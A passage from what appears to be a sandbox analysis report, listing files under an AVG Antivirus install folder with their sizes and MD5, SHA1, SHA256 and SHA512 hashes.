                                                                                      SHA1

                                                                                      da8332afe2bad530c8ce6618c8f593e590a3c735

                                                                                      SHA256

                                                                                      307c2de420e5fa403dc4408a90a4345427f89766b14819e1cc2eea403c497724

                                                                                      SHA512

                                                                                      ad433df67521d1862aa9147e27cb240f79f8dd24f5ee45788ba904bf6d9d079806504aee2d61cb6ec0806abc9911bd912482d236ad8596abe156cc7227ec7aea

                                                                                    • C:\Program Files\AVG\Antivirus\gaming_hook.exe

                                                                                      Filesize

                                                                                      530KB

                                                                                      MD5

                                                                                      23916da1ea103f9731ee678b72b6e6c7

                                                                                      SHA1

                                                                                      84c1021baaddee7182df2e640f3cf4ba4231c004

                                                                                      SHA256

                                                                                      688f2651f94fd1f0f9e4adfbefd6cbdf883647bf1451295952f56ceb8d90e156

                                                                                      SHA512

                                                                                      d783aa18e6e1c01f8b065970309c3bea90b3144b693f949fa3022d003a89ab920f62c4980213a3bef423cad329d5d0e24b0502e777b3b0597b2c7c57fa600e2e

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\about.js

                                                                                      Filesize

                                                                                      23KB

                                                                                      MD5

                                                                                      f80ce5b127f8894b24ade7ac867e6276

                                                                                      SHA1

                                                                                      3e2c37fde69a412d1da2fbbaa03b431c8771efeb

                                                                                      SHA256

                                                                                      72cce438d703140d9735e9f3198b850b7d60534b2e56109b4704e78e328e8856

                                                                                      SHA512

                                                                                      76ce4c9ae65ce87c24a6c3c666c94135cb6b832343e7d20b689700bc51064633f68d46e465f3abc246224e5e3e4745b53c63d2abbf6d133c44fafc7b7032c8d7

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\antiRansomware.js

                                                                                      Filesize

                                                                                      45KB

                                                                                      MD5

                                                                                      236a21276f93872a942a5851d4b65416

                                                                                      SHA1

                                                                                      7c1dae06a3f2bf96b4a8b2e2e8406d3a5ae4d22c

                                                                                      SHA256

                                                                                      f33524597be504cfdea8de1c5322097d16d2a6b499159fe285b66f903b0644b4

                                                                                      SHA512

                                                                                      2c256b5d1b3b48b44b8d14fabad2fdda7a5efdf441b88600722e117fc348fd40c7a79f2ef69a570a94000a6100a4baa87b87219d8aec3d512942ac4ce8359f18

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\ask.ogg

                                                                                      Filesize

                                                                                      23KB

                                                                                      MD5

                                                                                      a3b4b5563b0714a5f86b6558ee703d9f

                                                                                      SHA1

                                                                                      d21280d0c8b593257a7ca10f41c73e49f7424b5a

                                                                                      SHA256

                                                                                      4a2c37cbecf92e6bf0ff463759fb5034391091edd58508a44616883ea524d50b

                                                                                      SHA512

                                                                                      3aec734a34f580beec9b33cfa5b94bf979aa73abeaedadf8d03e82ce98dfa7cb0b4fb987df15e1707c9b14b458233ab28f471d3c786253937af7b0484580794c

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\browserDetection.js

                                                                                      Filesize

                                                                                      80KB

                                                                                      MD5

                                                                                      33cb670cf361dcd432e5a2cc4be24be2

                                                                                      SHA1

                                                                                      cb38b3c93c8b461def1405feb316fc96b52dedbe

                                                                                      SHA256

                                                                                      c9813d44dc4c3db500c1463112b28390c5a5625472145695a2505560a4ac0d61

                                                                                      SHA512

                                                                                      ada48d69efbcd7278baceb48bc961267a40c0e1381809a906c1ca930b5ce8b312ee580693e1e9e14f6c09886b8288f035e25cefeae81093b110cc72ce650402d

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\browserDetectionWindow.html

                                                                                      Filesize

                                                                                      692B

                                                                                      MD5

                                                                                      91ce39a264c74f8638112282be9664ab

                                                                                      SHA1

                                                                                      9bddd0eb43fd64ea04ae383e4232819cc537514f

                                                                                      SHA256

                                                                                      4fe75e1f04a9cff36d45b3f8879e65d5aefbac61e20534936ad72c5c7d94392c

                                                                                      SHA512

                                                                                      c1b9084b91da6be8be560620af801f89e6000fcf8c72206a8838eeddd78bfe3c33aaf111076aa26371daaf1ed5f750d7b505ea9554f1345cbc0ab8316dbed9d1

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\browserExtensions.js

                                                                                      Filesize

                                                                                      18KB

                                                                                      MD5

                                                                                      a50da0ccc939b337b0cd943428f226e0

                                                                                      SHA1

                                                                                      ad5639768eea5ac7fd461f3a9e2eaa23546cab38

                                                                                      SHA256

                                                                                      5afc2f7471f75191883cc33a9c3d1dee39f80fddaef9f71e41d16d005ace942b

                                                                                      SHA512

                                                                                      94c9d37b1c56fa7975b54750aca566d57d17d277a851a9847f730993ae688f6decb01904189074dfccb9bde0dee8e17eac81451b41c3b0b0a50ac30f589cf42f

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\core.js

                                                                                      Filesize

                                                                                      15KB

                                                                                      MD5

                                                                                      4ba5b5281a8e897ffc430026ba47f935

                                                                                      SHA1

                                                                                      a918597a4c65df4be5be7f08e68ff5028c1d03e1

                                                                                      SHA256

                                                                                      2f7b79c7d80f799a481e3ce3804ac71ac65ade4a589f520a60b05e2467f4d879

                                                                                      SHA512

                                                                                      64b9edd1484954ce834be55576e68727b7c077e8a3cce641a3528d66e4c0ed4b91186423d97e5b629c392e3cc76edb0bfa0ed5b1a3228b2475be3066a5608887

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\darkWebMonitor.js

                                                                                      Filesize

                                                                                      45KB

                                                                                      MD5

                                                                                      b654295431cedd93b59e2a098dda9e37

                                                                                      SHA1

                                                                                      dda85b10ad36bb2108ca661ce51c593ef9d82d13

                                                                                      SHA256

                                                                                      6030ac37c6bb398037fc9d10060b3568add1e34cbcaece7b481612126afc06af

                                                                                      SHA512

                                                                                      31307eaf88ad2da4e18053b86e1214ff138d213aa7a561433f9ce4cfa4c94e38a0e7bc0d2eb8cd1c1bbe2fc0592de52e3959355d60b2d779173cc000894ff628

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\dashboard.js

                                                                                      Filesize

                                                                                      99KB

                                                                                      MD5

                                                                                      25982ab8b5ded1d043ccbcacb9a20e26

                                                                                      SHA1

                                                                                      cbb9c959ea3d7ea87c15d8b6e9b8bdcee83e94bc

                                                                                      SHA256

                                                                                      d052ba71d4cbdc0c43c483485dc115e05de3468e00f41c687c5eb2cbc07406a2

                                                                                      SHA512

                                                                                      4307c4822fb02eb9de496fa8a2684901064501f6d11e2bc741f0f85f607d87d3d3bbd4c8d46aeccb2e6effa343b1c67e2a6d95fd3bb55cc2035277dbbc2fbb0a

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\dataShredder.js

                                                                                      Filesize

                                                                                      48KB

                                                                                      MD5

                                                                                      caa18b3a0528aeccf8d4dad3395321e4

                                                                                      SHA1

                                                                                      7b87716e73b22dc92fde26d67f736bf40e302b83

                                                                                      SHA256

                                                                                      8bbcd149f95f3f5080c28834664fdd96018bbf63c630339f4a50d3c3e92ecc38

                                                                                      SHA512

                                                                                      bc34cd841a500bd8fff145f9fd109967729c36a5a018015ebdc87c6dc713d143abb7b19c2b57e8a164ad7bdf1ee122349df260532affc9105d2624d7724673f1

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\doNotDisturb.js

                                                                                      Filesize

                                                                                      34KB

                                                                                      MD5

                                                                                      d40fb0a1dd5fb55e9b754771e55c159f

                                                                                      SHA1

                                                                                      ad92974870b86c0fd7e2d6f08484fca3e27b23a4

                                                                                      SHA256

                                                                                      c7575ef4f956763b9e5db05a22d4ab03743bb6df66966ab7ed3ad2d2cfdda7e3

                                                                                      SHA512

                                                                                      113844b544c4a6248e5e8099d82753f26075399d1fd89d12b02e03e92f4534bb97cd56155d93d057cc0f10a5b6bb0dde5668081c6be8ee79273152edfbe28fb6

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\done.ogg

                                                                                      Filesize

                                                                                      22KB

                                                                                      MD5

                                                                                      dd771017a31b4b6b88cba564b6b4c86e

                                                                                      SHA1

                                                                                      63f12d6e8d2fad5bd8e3b210cc20cc5fce8da930

                                                                                      SHA256

                                                                                      bd6a50e8b30dccf4575c91596b2b85875b236fd2b1b8fd1de5fc714f0b673804

                                                                                      SHA512

                                                                                      6958f2aca7a95f28f181febd9b09ae60e6c4f336d30155433cc506fd1147dbc43125bafc39e7f4cc06c68f90566fc957c92a3ed540d4ca830a8e11e7df2c5969

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\driverUpdater.js

                                                                                      Filesize

                                                                                      10KB

                                                                                      MD5

                                                                                      e33c9b760d307e91c7a322245f5037bc

                                                                                      SHA1

                                                                                      dd439239e5a57f1e44e1d4033bb0ba8e6ae84752

                                                                                      SHA256

                                                                                      2d09ca1db9d69738916cdf6baaad0deb7afe19a7ed9a3c10dfce564e45dac224

                                                                                      SHA512

                                                                                      b423cc776b9c33c48f601d25b476e236d25eddf5bbc1aded53b2d6a4a89978a3ab22f8ba0d7d0c926dcf78eb7b3560b9f678bc4a519ef7736dd7b12a63f03257

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\feedbackForm.js

                                                                                      Filesize

                                                                                      34KB

                                                                                      MD5

                                                                                      de584736f625995f5e8c0299a8271212

                                                                                      SHA1

                                                                                      19ff6fe1ee3626c1b0f46eb2335a51fe0e987bfb

                                                                                      SHA256

                                                                                      2ae8f8344e89086cb8ce87822caa15058de096440598223b6ee317af9ea31942

                                                                                      SHA512

                                                                                      97c461d025f8f87db325acde4b78f268229c5291970ac9de24bbbe6793cac0d0c406e6b62fe084bd29196a0a98d069b1724cc59e934de23768ce050b3a85d1b9

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\firewall.js

                                                                                      Filesize

                                                                                      232KB

                                                                                      MD5

                                                                                      bfff552df47ad19c539967f1a48d1163

                                                                                      SHA1

                                                                                      c1d6e8888f9d0a17c189aa382a5b8fd236fe16b1

                                                                                      SHA256

                                                                                      7b72efe59238ab7827f367642ae5ba75996385ae9fc420b665f7769e63262300

                                                                                      SHA512

                                                                                      f8f98aef20c419604f7cdd6c5e91323e49cdf8a7796101c645b0aea2280e667733e599fcd7fc4208a412969c197237eb2fafe4582d01947f97633624d301c58a

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\help.js

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      036386e83980ee5c0e5fede29f60c2c1

                                                                                      SHA1

                                                                                      3f4929c1cac4ae8c845362e48a1871af340bccd5

                                                                                      SHA256

                                                                                      863b469e1a99e7557dffb4cde3792f9d00591325a3f8db31c454801d229ca83c

                                                                                      SHA512

                                                                                      d4dbf68d60ff090c51c8c1e9848af1fe99d1b8b60f3cc27b23e5e77c9a156cd9ddd00ad6458705be0628d08d31a950067c83e2998a8f74fbade78c55f8ef282c

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\i18n.js

                                                                                      Filesize

                                                                                      194KB

                                                                                      MD5

                                                                                      41200172a9c29ce56c51cf26d53674f6

                                                                                      SHA1

                                                                                      64dd819b571e28f451fed6c9b2b14b8d7930773d

                                                                                      SHA256

                                                                                      b4b017b43b5972bb309a6b4f1ce4b574af5c5409cd5cdc2f2dae48c12e6c3fba

                                                                                      SHA512

                                                                                      dac305f6551ba172888e27e1e7fdf26a159a5c9150b66542d0802dc3e8fd6bf44363684198f61a5f74ba3030bd7230261daa8092d5186341571b083e5a5c108e

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\kin.js

                                                                                      Filesize

                                                                                      243KB

                                                                                      MD5

                                                                                      fc7626e13a5702879c0a94b3e41a9da9

                                                                                      SHA1

                                                                                      61bf78822dd90a6f13e7d4c8b3604ff38fd17c0c

                                                                                      SHA256

                                                                                      b8b8920dbc572d8cceeb3db5e16813b51db5cae2060b5fe40a6c5fb936605d08

                                                                                      SHA512

                                                                                      0a7046c05d4e53a8b39d98fac6938b2148a36718f0629a1c2f6bea41853c8fc2ce45ce1c5b214bdea6a16ea73d3d42ee72d7a1c60f7b9b59dc47f794b3457c8e

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\libs.js

                                                                                      Filesize

                                                                                      17KB

                                                                                      MD5

                                                                                      f42d2057fac13f883d977704d6617454

                                                                                      SHA1

                                                                                      39e617488f90fc3df0f26a8e8fa56f128c324e24

                                                                                      SHA256

                                                                                      277425906c3c9178e3c55fec7de3c34b47ee2930359b3b1e2222a243fc7d777e

                                                                                      SHA512

                                                                                      39b51d1e9f0a2849eef0b7389a6c016d150075cbb58ca15f0b83fa408554f13ec56e9fe71ae4c6d42f624973e66c91f8c8a77ec3ce26733c2e13a6bbf8917900

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\locale-id.json.ipending.33edda96

                                                                                      Filesize

                                                                                      337KB

                                                                                      MD5

                                                                                      3441d5de51c30ac89f1f27f3fd12fca6

                                                                                      SHA1

                                                                                      8001e92fe214017bd56ac334aae02e11665481c0

                                                                                      SHA256

                                                                                      7d4d719cf8dd480b9cbfb75668db6d4a029527cae3dd0e3bbb9256ac4170c2c4

                                                                                      SHA512

                                                                                      073d3ca096d2d5e041ff9c987aeebe04f65a2f9f8ab9f69ea34c1da7e33a8030f7ef6e8b9d89e0e5d799cf37e0581f3efb6e51d5e9942e25f159188d4f37d8fc

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\mainCss.css

                                                                                      Filesize

                                                                                      362KB

                                                                                      MD5

                                                                                      d5e00c5150f1ec787a16d6f937addb69

                                                                                      SHA1

                                                                                      1fa15b6e0cb3ac91588c9b350093c64f1a02ab07

                                                                                      SHA256

                                                                                      4b890a90c2d3ec9e06ae5abf971da52539e13caaf4c62a8a5bb68641c339ef2c

                                                                                      SHA512

                                                                                      803e5ea1a2d33fce07acef75cbe5a08f45f8d4531932c15b75a6a27259d28751228e70c1029f0f8d82f85c1b53177151354ca09cb27b35310858cdb08e3a8298

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\mainCss_light.css

                                                                                      Filesize

                                                                                      70KB

                                                                                      MD5

                                                                                      0cfecee1dcc00562e8068359b748c227

                                                                                      SHA1

                                                                                      41811a783a8a1424e90938f774b66d0aa6f725b5

                                                                                      SHA256

                                                                                      bbdeb85a242922ece400f4530d5e246a0e7e3b369258a5676f6324427c42ef5e

                                                                                      SHA512

                                                                                      2dd91c3dacd58eb74299ad37fdb43ed39e222a1b970f7e05c32a61e2b3dbb5a135de1bdee3ab04b8909e171b333c12800259f8e8fd95a8787135b14b39e94f78

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\mainFont.css

                                                                                      Filesize

                                                                                      165KB

                                                                                      MD5

                                                                                      2774b5993af743176ccb54721c24f00e

                                                                                      SHA1

                                                                                      1c08d0e75eb3882fb396d8cb327fbdf29afb768e

                                                                                      SHA256

                                                                                      a362b25017ce2c2bcebae6ad0f5751cefd19970974eac3e260e0a72118f4b8d5

                                                                                      SHA512

                                                                                      8b40fbee389dd267441f2029e59150f4a5c4702b85e507b9cd0a01842360c40c85bcd636aa3947925e4be48f7c4d1f2cfc08410c7b201244200d0f9213c48797

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\mainLayout.js

                                                                                      Filesize

                                                                                      209KB

                                                                                      MD5

                                                                                      defafc76ec7fd9012d1fd74c34426f40

                                                                                      SHA1

                                                                                      ce292c48449bf917ac2591d2cd9c90da8a7020e3

                                                                                      SHA256

                                                                                      72bdcf6710e0363e905a8e12846e150800639b2a0eab9085f09e4e9509204de4

                                                                                      SHA512

                                                                                      2227bde72fe351b6139fe90a4dcb1cc04c68a98750209fcfc4f5dd5c499ac6490baf1055b0b4a1dcabcd1cdd7d74bb9dc61570ba0f3790094ce7c0d3a45d9217

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\mainLayoutCss.css

                                                                                      Filesize

                                                                                      25KB

                                                                                      MD5

                                                                                      82434153a12d04124e7beef19758a133

                                                                                      SHA1

                                                                                      440f8dcedc388d39a0e907a421e36ff29565a9c1

                                                                                      SHA256

                                                                                      828496d709e99d01641e568d715638f1ed350e5fc17130b402050ba15b5c36ae

                                                                                      SHA512

                                                                                      a67b99fa8329c545a0385d4e49d6e36606100e184885945fc71f14739ab043efddf1741f7ea68b589e34b8def9012abf6663b6c62030b69d2a440230b1b12c28

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\mainSprite.css

                                                                                      Filesize

                                                                                      221KB

                                                                                      MD5

                                                                                      eafebe9356e0d2933ad5ed8903a25bd0

                                                                                      SHA1

                                                                                      ef9e89711204060efff55d83b4aabd9d92855207

                                                                                      SHA256

                                                                                      1d47c3d5dce832f5d9eeebc86ec32137e2299155c19958f159cfd7062b33a8f7

                                                                                      SHA512

                                                                                      e833c637de762a1e805926204e8a8a8f855c578727dc989aae7cef8f28654dbc4cf9fac0fa0173c924d905ca6ae6f625a5324497a4879c97574044ae5157ade1

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\mainVars.json

                                                                                      Filesize

                                                                                      4KB

                                                                                      MD5

                                                                                      cafb9c7fc9aba63917dfc2349f792479

                                                                                      SHA1

                                                                                      1732f063f7e779480abb9bf9a5ab6a7ca61ca1fe

                                                                                      SHA256

                                                                                      bebcee43aa864c5e538db7dfe03389200a24c8d3139004e5a9710971e64e2c58

                                                                                      SHA512

                                                                                      4df61f491b3229799fb41cf9caeb2a1040c06a68c4a724cd2fc343cff85a46292e1281ccca49110c4fdb746a88b8a1d893ec353f008f42ddf564196384e85cba

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\mainWindow.html

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      358a247b989c2e44c8e800ebb551d97c

                                                                                      SHA1

                                                                                      6752292e14325009221e8d89a1344cd29662d890

                                                                                      SHA256

                                                                                      f38cf58c36eded53f87dcc10ff9ce67b30c5d6d74a14b6ab8c2cf44167df7f72

                                                                                      SHA512

                                                                                      b4b0323e5c9641aea8d5084c01d553d19a8277b34e71adfaf359d219a6579ca63b6f9be8e79abcd4a6e981b66cbda1dda32e8c87b9b41de9b50803d1e3f5464c

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\myLicenses.js

                                                                                      Filesize

                                                                                      2.2MB

                                                                                      MD5

                                                                                      753e43b9a3bfb3a65862a0adf554975e

                                                                                      SHA1

                                                                                      2ccc5ea5ee6c5698824f5322025cc113953839bc

                                                                                      SHA256

                                                                                      d9e9c28d7708d1bd7df28623744d8d05ff51ba56d01b9c5d16014440db19b376

                                                                                      SHA512

                                                                                      32d9817953bf63f76f0aa52cd3eb39e2b0989e4c2e9992f21c3baf50a51eeacb8f95cc520584609ad33e4d88c92cc3f699d2d0dfa62ab0233987de855862f8a9

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\napi.js

                                                                                      Filesize

                                                                                      97KB

                                                                                      MD5

                                                                                      cd334a937637fcf480d2f2334f62c5e7

                                                                                      SHA1

                                                                                      81673ce8c0efb740bfaa3ea0eb40b91ac2d549ae

                                                                                      SHA256

                                                                                      8b6545eaf9ff9bf8e642ec9c1e190b5b83708bbf7d3a2c7d2c013b7dbaa585af

                                                                                      SHA512

                                                                                      248935eac40183a9b68dacf080c08b42733f6526e8403b37b2740ef5efd75eaa398c62a41cbcf9f02d9d48a6209ff5e9f212556423d7971b61833bb0a0bbf7ac

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\napiAdapter.js

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      ee06f390ff5a822c4c9c9ae58a062478

                                                                                      SHA1

                                                                                      6f9078f11a71699fdcbd5439e9129bdcebcfabb3

                                                                                      SHA256

                                                                                      7eb6045fc1ed71e4feecda7b81c279b62178a77a0a5b96ce480833c860fde613

                                                                                      SHA512

                                                                                      500884d7706a5a8336b412e6b91719269dc5829d43d2b3d2ead1b5196cdfa7abfacba4cfc479828b914893f83b45c2beb1c766a95efa840edb8f088811ea740e

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\napiExtensions.js

                                                                                      Filesize

                                                                                      471KB

                                                                                      MD5

                                                                                      dbe3a03f8b8ab38fd2b2a97e62ffce7e

                                                                                      SHA1

                                                                                      1495726f4a07edeced99d3463373414ff659f259

                                                                                      SHA256

                                                                                      38269525c0b52434eca8d49106bf90ee54f8f84d14ea91ddc9f486655aea6555

                                                                                      SHA512

                                                                                      4a014caa0ab1036f7285ee6057d3ab9f53614c4eb5cb1867852eb37078053179cfe75fa87ab4aa0b8c28b1d05d1e130b0877023d4046152e90308b1a09a04680

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\network.js

                                                                                      Filesize

                                                                                      242KB

                                                                                      MD5

                                                                                      a5c887db4cbe7a0635a7b6cd6623a791

                                                                                      SHA1

                                                                                      e8e4ad7d219c27fa55e61ea38c6658d0be1b805e

                                                                                      SHA256

                                                                                      4904675aef001ba2e63a0123b0407b2165d103e61da5aa13602d7866d4c6569c

                                                                                      SHA512

                                                                                      69c3587ee1f3ace66e367a584d173f3a8778602865534cf37a0ee629906332710a42b345d78891fc061bb3ad4b3c7ce2eb8dc0296fd2c1e96b759a22e87a4444

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\notifications.js

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      dd43041c0dfb586cb0286d1240c725f4

                                                                                      SHA1

                                                                                      6aa55e3c702a52622ff7b667e0d31f1ca623b8c0

                                                                                      SHA256

                                                                                      2f7638a08dc35a989cd87c0c2631fcf48fdd1960165a9fe4b2ed3ba909d98a0e

                                                                                      SHA512

                                                                                      9d766c0fb8af5ed1a95a2a83af32fc44e9b123b3465f0a7b9879f286dceb47c6f582536a5fe7719da368e65c19d4515376d5851c54819c67cdeba6391ec92046

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\notify.ogg

                                                                                      Filesize

                                                                                      16KB

                                                                                      MD5

                                                                                      5d21827de75ec11edbd54e38f153f288

                                                                                      SHA1

                                                                                      b85da53e3f8f5ed450c167381f00c807969444ca

                                                                                      SHA256

                                                                                      e851d3c62177df95503f1615e8a07b9d61ca9250784e2d00e0a325d76563dbc5

                                                                                      SHA512

                                                                                      d75ab0e9043a2fd06f14834cde7578f014fa4266a4ac05804943bd1b2880da37b56c00f4803b90aeeeec692ea40032f55d5ae4d5b9ece9cbaef3d3d0edae9a63

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\offline.htm

                                                                                      Filesize

                                                                                      975B

                                                                                      MD5

                                                                                      a593f86141b8a293372fffedacef35ec

                                                                                      SHA1

                                                                                      2f2c7d717a02b41d449975e0a95ebde71b93f1d4

                                                                                      SHA256

                                                                                      2e8f5b2746b08a673b2807423f9a9b0548b42eba499989a45b39661a8b540554

                                                                                      SHA512

                                                                                      a457cf8aabd28875dae9226943627e35e29aecbcad7ab95de2266e0f9970b04801c4cd83834aeda49b298f198fde0219c648712b8d8ee333e9fe17324dd1657e

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\overlay.html

                                                                                      Filesize

                                                                                      561B

                                                                                      MD5

                                                                                      74047eedc155440e5d55b4a8932f82fb

                                                                                      SHA1

                                                                                      a50d46ed4025ebeb44588c2a7c85e62dcd9bb16f

                                                                                      SHA256

                                                                                      b4812c1f202e598d3d26c3f08ef960ffa9e533f658865d1e1765df565b253058

                                                                                      SHA512

                                                                                      a37b6f1b7c5d2ddb03775982466c734d1e759d07f38a693b72f65dd29f6585be221229b92341eec0eca171cfdf81a60ac5197951856e3d9bf69348e7825ef849

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\pap.js

                                                                                      Filesize

                                                                                      305KB

                                                                                      MD5

                                                                                      39a0fb3f195da065a507f8dcf64967be

                                                                                      SHA1

                                                                                      73b746c890a1086c946967077f50f99658ea0d25

                                                                                      SHA256

                                                                                      cd0833d825129bbb005fae6c3bee2e870375d5f8614a777a6086ce49bad63816

                                                                                      SHA512

                                                                                      2c026363010babd1a25984594ad554328bad195b7552a0c8061aa7c5a265802921c96d69bf87b413342a3801437f4d1fa32837d29f772b73790cd06658fb6def

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\passwordProtection.js

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      5f2b3249e10a07cf5a3f4ffafde36dad

                                                                                      SHA1

                                                                                      c71ab818d00b064c512b5012df769038ab81b25e

                                                                                      SHA256

                                                                                      f66139e329a8ab01ca7e8908d20345bfbbde8a9eeb2a2980f58a92db87ba20c8

                                                                                      SHA512

                                                                                      22d444aa72ff36bcf9fc0085f18d6aa222a6f429bcdd80c5c41a4a7f383fd15489851a04b9d834bc2769b5a4398cdfcc00840ff7e21517af8a82b7c141fdf59b

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\plugins.js

                                                                                      Filesize

                                                                                      6KB

                                                                                      MD5

                                                                                      a7dcf22cd3264c92aa005065956ef9e2

                                                                                      SHA1

                                                                                      ea4a7f6f683503b67613ca1b639cddb98d142b5f

                                                                                      SHA256

                                                                                      2f7a0f1577488500e15d738c101548b0542ad27ad5ac5cc53411635d0036b02e

                                                                                      SHA512

                                                                                      245f6dd68b15a6fc5a466e03d5b7fc07bd737746fb93da9efdc697f531e4f28c1b3a1b1dbbfdfa86ee5ca832bb856383ad332299884f44b60975456bf1fcb5d6

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\ras.js

                                                                                      Filesize

                                                                                      24KB

                                                                                      MD5

                                                                                      99fe6c94a80860b3f699451ddf8f7a96

                                                                                      SHA1

                                                                                      c827c356eecbab559226a03a71f1db1cf01b028b

                                                                                      SHA256

                                                                                      5b29c0fe547ee6b16046aaba335f98aa545bb36239d69fbdb35c1f1419443a76

                                                                                      SHA512

                                                                                      2ed8c29cdca28b3c48fea10004c998c521c7983fd3556798d45c7ad1651274743ff325053d97378b83cf41c15f81e94d73dc4b83d29e8ba979cd8d15440c1560

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\rescueDisk.js

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      8d945e0476b19745043d87da467026ef

                                                                                      SHA1

                                                                                      05a559ab0ca4e3e9520b034c14d9cf6569f877ab

                                                                                      SHA256

                                                                                      3e0a0bbb9a8897b68ee5a0deb8602b436d77aeb9b313642b05e27d77a3546db7

                                                                                      SHA512

                                                                                      c172d024ddf514ead6cb807bc5cc4dd578b7b5c4951583f8eb4336bf79fe574e2c5974d2196166117344d007b3a802b653856eb3e62f6525dc44cab6487767f8

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\scans.js

                                                                                      Filesize

                                                                                      280KB

                                                                                      MD5

                                                                                      3efe5f553ccc314833b9f25a26923118

                                                                                      SHA1

                                                                                      164499fe14d66cb01abd1fe4dbe5448402dc1b5b

                                                                                      SHA256

                                                                                      969744e76594decfcb4567b7bfbcbce404f25ae9ec168114d1a282cabd29809d

                                                                                      SHA512

                                                                                      3cd12f98164e766462bef1a242f8f2e88412753cffc43b369a8ddee0fd930d8b575929e5d96a17d87ac0f439bbf3611d72dbb4443dfd253f7c38902d6aca608f

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\search.js

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      b373095f94e80f81202c4c72f7ee04e3

                                                                                      SHA1

                                                                                      b80d6d8bdf34b1f1866b07a2b167a1db4a7d950b

                                                                                      SHA256

                                                                                      22ed08f1872521b17167506c6ddc2f472c5d15abab6b192204515f9f1502b017

                                                                                      SHA512

                                                                                      21f639e1b8668323049c4f06d0fdac066b3cebed2431c4ba2b2b78153e38c21437aecc444ae45be0046b8fa1eb6934f3673d9b0514920a50462af4cde71528ff

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\secureDns.js

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      4d59852b1647348ead3a02d5ae4ebd8b

                                                                                      SHA1

                                                                                      2c7a281878cc86b50212f503d39bf7c4d09f0d5f

                                                                                      SHA256

                                                                                      a4fca9b9d23acd48b0fe5885db276740d01d025cde75de4695af49a35a24d65d

                                                                                      SHA512

                                                                                      5b83f0c74fe45f1941e1440c9662f43f46e5a4b39a50a4e4cd0d9d3e7745f82e725a5331b592408b99b198223dfc5a76ae10b178059569911210ad67fe82b788

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\sensitiveData.js

                                                                                      Filesize

                                                                                      40KB

                                                                                      MD5

                                                                                      67d572f84faac3adac854b0686afae4a

                                                                                      SHA1

                                                                                      ae1c1164d49212d353b8ef67317997a8ad921c78

                                                                                      SHA256

                                                                                      3ee53ed0d77645369286c440e4ed07b29a4f06031462db8ab75b8390ca18a49e

                                                                                      SHA512

                                                                                      9a9f6afb9a212e61ec62e99d1572fa3fc516aeb7c9fbf659f6cbbdd36caebf2527ba077ba159d95338ffdb198805849dbdf5547437435a103b5d0938b8ce5e89

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\settings.js

                                                                                      Filesize

                                                                                      279KB

                                                                                      MD5

                                                                                      ea64f432bf4c98bb579e514e761c4cbd

                                                                                      SHA1

                                                                                      6d5c952d38cbdab1bf54652f7353d1d5bd296e7f

                                                                                      SHA256

                                                                                      05831f75e79f7cbe75eed47487b4ee61e13995dc68409c578b4b92c1ef0b7fe2

                                                                                      SHA512

                                                                                      9223b7f6cecab5923c7b274d8e4a6dabe0b23fa8d14d64187b683db759cfea9514c36141f190d7ceffdbeeeb5cdc9de2231f51f8b28167146911771006e47071

                                                                                    • C:\Program Files\AVG\Antivirus\gui_resources\default_av\shields.js

